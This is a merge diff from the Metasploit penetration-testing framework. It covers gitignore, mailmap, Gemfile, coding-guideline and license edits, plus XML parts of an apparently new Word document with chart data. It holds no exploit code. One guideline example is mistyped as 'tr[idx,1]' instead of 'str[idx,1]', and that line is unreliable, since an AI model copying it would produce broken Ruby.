Land #2746 , weekly update grammer/caps fixup

Minor grammar/caps fixup for release
Land #2741 , @russell TCP support for nfsmount
2013-12-09 14:18:42 -06:00 · 2013-12-09 14:01:27 -06:00 · 2013-12-09 09:46:34 -06:00 · 2013-12-09 21:26:29 +11:00 · 2013-12-09 03:05:08 -06:00 · 2013-12-09 02:50:36 -06:00
2770 changed files with 28251 additions and 15385 deletions
@@ -41,3 +41,13 @@ tags
 *~
 # Ignore backups of retabbed files
 *.notab
+
+# ignore Visual Studio external source garbage
+*.suo
+*.sdf
+*.opensdf
+*.user
+
+# ignore release/debug folders for exploits
+external/source/exploits/**/Debug
+external/source/exploits/**/Release
@@ -0,0 +1,3 @@
+[submodule "external/source/ReflectiveDLLInjection"]
+	path = external/source/ReflectiveDLLInjection
+	url = https://github.com/rapid7/ReflectiveDLLInjection.git
@@ -10,6 +10,7 @@ jlee-r7 <jlee-r7@github>           James Lee <James_Lee@rapid7.com>
 joev-r7 <joev-r7@github>           joev <joev@metasploit.com>
 joev-r7 <joev-r7@github>           Joe Vennix <Joe_Vennix@rapid7.com>
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan.vazquez@metasploit.com>
+jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <juan_vazquez@rapid7.com>
 limhoff-r7 <limhoff-r7@github>     Luke Imhoff <luke_imhoff@rapid7.com>
 shuckins-r7 <shuckins-r7@github>   Samuel Huckins <samuel_huckins@rapid7.com>
 tasos-r7 <tasos-r7@github>         Tasos Laskos <Tasos_Laskos@rapid7.com>
@@ -19,7 +20,7 @@ wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
 wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
 wvu-r7 <wvu-r7@github>             William Vu <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>             William Vu <wvu@nmt.edu>
+wvu-r7 <wvu-r7@github>             William Vu <wvu@metasploit.com>

 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -39,8 +40,8 @@ Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
-corelanc0d3er <corelanc0d3er@github>   corelanc0d3r <peter.ve@corelan.be>
-corelanc0d3er <corelanc0d3er@github>   Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
+corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
+corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
@@ -67,6 +68,8 @@ nevdull77 <nevdull77@github>           Patrik Karlsson <patrik@cqure.net>
 nmonkee <nmonkee@github>               nmonkee <dave@northern-monkee.co.uk> 
 nullbind <nullbind@github>             nullbind <scott.sutherland@nullbind.com>
 ohdae <ohdae@github>                   ohdae <bindshell@live.com>
+OJ <oj@github>                         OJ Reeves <oj@buffered.io>
+OJ <oj@github>                         OJ <oj@buffered.io>
 r3dy <r3dy@github>                     Royce Davis <r3dy@Royces-MacBook-Pro.local>
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
@@ -1,2 +1,2 @@
 --color
--format documentation
+--format Fivemat
@@ -1 +1 @@
-1.9.3-p448
+1.9.3-p484
@@ -14,48 +14,50 @@ gem 'robots'
 gem 'packetfu', '1.1.9'

 group :db do
-	# Needed for Msf::DbManager
-	gem 'activerecord'
-	# Database models shared between framework and Pro.
-	gem 'metasploit_data_models', '~> 0.16.6'
-	# Needed for module caching in Mdm::ModuleDetails
-	gem 'pg', '>= 0.11'
+  # Needed for Msf::DbManager
+  gem 'activerecord'
+  # Database models shared between framework and Pro.
+  gem 'metasploit_data_models', '~> 0.16.6'
+  # Needed for module caching in Mdm::ModuleDetails
+  gem 'pg', '>= 0.11'
 end

 group :pcap do
  gem 'network_interface', '~> 0.0.1'
-	# For sniffer and raw socket modules
-	gem 'pcaprub'
+  # For sniffer and raw socket modules
+  gem 'pcaprub'
 end

 group :development do
-	# Markdown formatting for yard
-	gem 'redcarpet'
-	# generating documentation
-	gem 'yard'
+  # Markdown formatting for yard
+  gem 'redcarpet'
+  # generating documentation
+  gem 'yard'
 end

 group :development, :test do
-	# supplies factories for producing model instance for specs
-	# Version 4.1.0 or newer is needed to support generate calls without the
-	# 'FactoryGirl.' in factory definitions syntax.
-	gem 'factory_girl', '>= 4.1.0'
-	# running documentation generation tasks and rspec tasks
-	gem 'rake', '>= 10.0.0'
+  # supplies factories for producing model instance for specs
+  # Version 4.1.0 or newer is needed to support generate calls without the
+  # 'FactoryGirl.' in factory definitions syntax.
+  gem 'factory_girl', '>= 4.1.0'
+  # Make rspec output shorter and more useful
+  gem 'fivemat', '1.2.1'
+  # running documentation generation tasks and rspec tasks
+  gem 'rake', '>= 10.0.0'
 end

 group :test do
-	# Removes records from database created during tests.  Can't use rspec-rails'
-	# transactional fixtures because multiple connections are in use so
-	# transactions won't work.
-	gem 'database_cleaner'
-	# testing framework
-	gem 'rspec', '>= 2.12'
-	gem 'shoulda-matchers'
-	# code coverage for tests
-	# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
-	# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
-	gem 'simplecov', '0.5.4', :require => false
-	# Manipulate Time.now in specs
-	gem 'timecop'
+  # Removes records from database created during tests.  Can't use rspec-rails'
+  # transactional fixtures because multiple connections are in use so
+  # transactions won't work.
+  gem 'database_cleaner'
+  # testing framework
+  gem 'rspec', '>= 2.12'
+  gem 'shoulda-matchers'
+  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  # see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
+  gem 'simplecov', '0.5.4', :require => false
+  # Manipulate Time.now in specs
+  gem 'timecop'
 end
@@ -18,6 +18,7 @@ GEM
    diff-lcs (1.2.4)
    factory_girl (4.2.0)
      activesupport (>= 3.0.0)
+    fivemat (1.2.1)
    i18n (0.6.5)
    json (1.8.0)
    metasploit_data_models (0.16.6)
@@ -62,6 +63,7 @@ DEPENDENCIES
  activesupport (>= 3.0.0)
  database_cleaner
  factory_girl (>= 4.1.0)
+  fivemat (= 1.2.1)
  json
  metasploit_data_models (~> 0.16.6)
  msgpack
@@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
 need user input, you can either register an option or expose an 
 interactive session type specific for the type of exploit.

-3. Don't use "sleep". It has been known to cause issues with
-multi-threaded programs on various platforms running an older version of
-Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
-Rex.sleep() throughout the framework. We have found this works around
-the underlying issue.
-
-4. Always use Rex sockets, not ruby sockets.  This includes
+3. Always use Rex sockets, not ruby sockets.  This includes
 third-party libraries such as Net::Http.  There are several very good
 reasons for this rule.  First, the framework doesn't get notified on
 the creation of ruby sockets and won't know how to clean them up in
@@ -54,49 +48,46 @@ already implemented with Rex and if the protocol you need is missing,
 porting another library to use them is straight-forward.  See our
 Net::SSH modifications in lib/net/ssh/ for an example.

-5. When opening an IO stream, always force binary with "b" mode (or
+4. When opening an IO stream, always force binary with "b" mode (or
 using IO#binmode). This not only helps keep Windows and non-Windows
 runtime environments consistent with each other, but also guarantees
 that files will be treated as ASCII-8BIT instead of UTF-8.

-6. Don't use String#[] for a single character.  This returns a Fixnum in
+5. Don't use String#[] for a single character.  This returns a Fixnum in
 ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
-	str[idx,1]
+  str[idx,1]
 which always returns a String.  If you need the ASCII byte, unpack it like
-so: 
-	str[idx,1].unpack("C")[0]
+so:
+  tr[idx,1].unpack("C")[0]

-7. Whenever possible, avoid using '+' or '+=' to concatenate strings.
+6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
 The '<<' operator is significantly faster. The difference will become
 even more apparent when doing string manipulation in a loop. The
 following table approximates the underlying implementation:
-	Ruby 		Pseudo-C
-	----------- 	----------------
-	a = b + c 	a = malloc(b.len+c.len+1);
-			strcpy(a, b);
-			memcpy(a+b.len, c, c.len);
-			a[b.len + c.len] = '\0';
-	a = b 		a = b;
-	a << c 		a = realloc(a, a.len+c.len+1);
-			memcpy(a+a.len, c, c.len);
-			a[a.len + c.len] = '\0';
+
+        Ruby            Pseudo-C
+        -----------     ----------------
+        a = b + c       a = malloc(b.len+c.len+1);
+                        strcpy(a, b);
+                        memcpy(a+b.len, c, c.len);
+                        a[b.len + c.len] = '\0';
+        a = b           a = b;
+        a << c          a = realloc(a, a.len+c.len+1);
+                        memcpy(a+a.len, c, c.len);
+                        a[a.len + c.len] = '\0';
+
 Note that the original value of 'b' is lost in the second case. Care
 must be taken to duplicate strings that you do not want to modify.

-8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
+7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
 excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
 for an overview of common and not-so-common Ruby version related gotchas.

-9. Never, ever use $global variables. This applies to modules, mixins,
+8. Never, ever use $global variables. This applies to modules, mixins,
 and libraries. If you need a "global" within a specific class, you can
 use @@class_variables, but most modules should use @instance variables
 to store information between methods. 

-10. Do not define CONSTANTS within individual modules. This can lead to
-warning messages when the module is reloaded. Try to keep constants
-inside libraries and mixins instead.
-
-
 Creating New Modules
 ====================

@@ -12,7 +12,7 @@ License: BSD-3-clause
 #
 # This license does not apply to third-party components detailed below.
 #
-# Last updated: 2013-Mar-25
+# Last updated: 2013-Nov-04
 #

 Files: data/john/*
@@ -166,230 +166,6 @@ Files: lib/fastlib.rb
 Copyright: 2011, Rapid7 Inc.
 License: Ruby

-Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
-Copyright: 2006-2007, Francis Cianfrocca
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
-Copyright: Daniel Luz <dev at mernen dot com>
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
-Copyright: Marc-Andre Cournoyer
-License: Ruby
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
-Copyright: 2003-2011, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
-Copyright: 2007-2012, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
-Copyright: 2006-2010, Daniel J. Berger
-License: Artistic
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
-License: LGPL-2.1
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
-Copyright: 2006-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
-Copyright: 2007 David Heinemeir Hansson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
-Copyright: 2011 Ben Johnson of Binary Logic
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
-Copyright: 2008-2012 Jonas Nicklas
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
-Copyright: 2010 Willem van Bergen
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
-Copyright: Rob Aldred
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
-Copyright: 2005-2012 Thomas Uehlinger
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
-Copyright: 2006-2011 kuwata-lab.com all rights reserved
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
-Copyright: 2008-2010
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
-Copyright: 2011 Travis Tilley
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
-Copyright: 2011 Sam Stephenson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
-Copyright: 2010-2012 John Crepezzi
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
-Copyright: 2011 Aaron Patternson
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
-Copyright: 2010 Andre Arko
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
-Copyright: 2005, 2006 Tobias Luetke
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
-Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
-Copyright: 2011 John Mair (banisterfiend)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
-Copyright: 2007 Clifford Heath
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
-Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
-Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
-Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
-Copyright: 2010 Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
-Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
-Copyright: No copyright statement provided
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
-Copyright: 2012 Lee Jarvis
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
-Copyright: 2009 Tim Harper
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
-Copyright: 2011 Sam Stephenson, Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
-Copyright: 2006-2012 Aaron Pfeifer
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
-Copyright: 2008 Yehuda Katz
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
-Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
-Copyright: 2007 Nathan Sobo
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
@@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

+#
+# Gems
+#
+
+Files: activemodel
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activerecord
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activesupport
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: arel
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: builder
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: database_cleaner
+Copyright: 2009 Ben Mabey
+License: MIT
+
+Files: diff-lcs
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: factory_girl
+Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
+License: MIT
+
+Files: fivemat
+Copyright: 2012 Tim Pope
+License: MIT
+
+Files: i18n
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: json
+Copyright: Daniel Luz <dev at mernen dot com>
+License: Ruby
+
+Files: metasploit_data_models
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: mini_portile
+Copyright: 2011 Luis Lavena
+License: MIT
+
+Files: msgpack
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: multi_json
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: network_interface
+Copyright: 2012, Rapid7, Inc.
+License: MIT
+
+Files: nokogiri
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: packetfu
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: pcaprub
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: pg
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: rake
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: redcarpet
+Copyright: 2009 Natacha Porté
+License: MIT
+
+Files: robots
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: rspec
+Copyright: 2009 Chad Humphries, David Chelimsky
+License: MIT
+
+Files: shoulda-matchers
+Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
+License: MIT
+
+Files: simplecov
+Copyright: 2010-2012 Christoph Olszowka
+License: MIT
+
+Files: timecop
+Copyright: 2012 Travis Jeffery, John Trupiano
+License: MIT
+
+Files: tzinfo
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: yard
+Copyright: 2007-2013 Loren Segal
+License: MIT
+
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
+<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
+</Relationships>
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
+<Template>Normal.dotm</Template>
+<TotalTime>4</TotalTime>
+<Pages>1</Pages>
+<Words>217</Words>
+<Characters>1238</Characters>
+<Application>Microsoft Office Word</Application>
+<DocSecurity>0</DocSecurity>
+<Lines>10</Lines>
+<Paragraphs>2</Paragraphs>
+<ScaleCrop>false</ScaleCrop>
+<Company>home</Company>
+<LinksUpToDate>false</LinksUpToDate>
+<CharactersWithSpaces>1453</CharactersWithSpaces>
+<SharedDoc>false</SharedDoc>
+<HyperlinksChanged>false</HyperlinksChanged>
+<AppVersion>12.0000</AppVersion>
+</Properties>
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+<dc:creator>Win7</dc:creator>
+<cp:lastModifiedBy>Win7</cp:lastModifiedBy>
+<cp:revision>1</cp:revision>
+<dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T22:46:00Z</dcterms:created>
+<dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-03T23:17:00Z</dcterms:modified>
+</cp:coreProperties>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet1.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet2.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet3.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet4.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet5.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet6.xlsx"/>
+</Relationships>
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="cylinder"/>
+<c:axId val="51657728"/>
+<c:axId val="69190400"/>
